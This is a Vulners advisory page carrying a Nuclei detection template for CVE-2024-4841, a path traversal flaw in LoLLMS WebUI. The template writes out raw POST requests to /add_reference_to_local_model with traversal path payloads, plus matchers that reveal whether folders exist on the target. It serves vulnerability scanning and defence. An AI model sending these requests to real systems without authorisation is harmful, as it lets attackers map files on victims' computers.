Vulners
Lucene search
LoLLMS WebUI - Subfolder Prediction via Path Traversal
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | LoLLMs Security Vulnerabilities | 23 Jun 202400:00 | – | cnnvd |
 | CVE-2024-4841 | 23 Jun 202414:33 | – | cve |
 | CVE-2024-4841 Path Traversal in parisneo/lollms-webui | 23 Jun 202414:33 | – | cvelist |
 | EUVD-2024-44422 | 3 Oct 202520:07 | – | euvd |
 | CVE-2024-4841 | 23 Jun 202415:15 | – | nvd |
 | PT-2024-33098 · Parisneo · Lollms-Webui | 23 Jun 202400:00 | – | ptsecurity |
 | CVE-2024-4841 | 23 May 202507:37 | – | redhatcve |
 | VulnCheck KEV: CVE-2024-4841 | 11 Mar 202600:00 | – | vulncheck_kev |
 | CVE-2024-4841 Path Traversal in parisneo/lollms-webui | 23 Jun 202414:33 | – | vulnrichment |
id: CVE-2024-4841
info:
name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
author: s4e-io
severity: medium
description: |
A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
reference:
- https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
- https://nvd.nist.gov/vuln/detail/CVE-2024-4841
classification:
cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4
cve-id: CVE-2024-4841
cwe-id: CWE-29
epss-score: 0.00674
epss-percentile: 0.47273
metadata:
max-request: 1
fofa-query: "LoLLMS WebUI - Welcome"
tags: cve,cve2024,lollms-webui,traversal,vuln,ai,vkev
variables:
folder: "{{to_upper(rand_text_alpha(10))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /add_reference_to_local_model HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"path":"\\Users"}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"status\":true}")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
- raw:
- |
POST /add_reference_to_local_model HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"path":"\\{{folder}}"}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100dd2b17c03ea82272342ae3dd9490279d1f26258ac5e09f1602e79486e43646d90220080def4d2712a692d3c2de8071e76ad3b29e4fd2a6d0880032c562fbe7e5aff6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.13.3
CVSS 34
EPSS0.00674
SSVC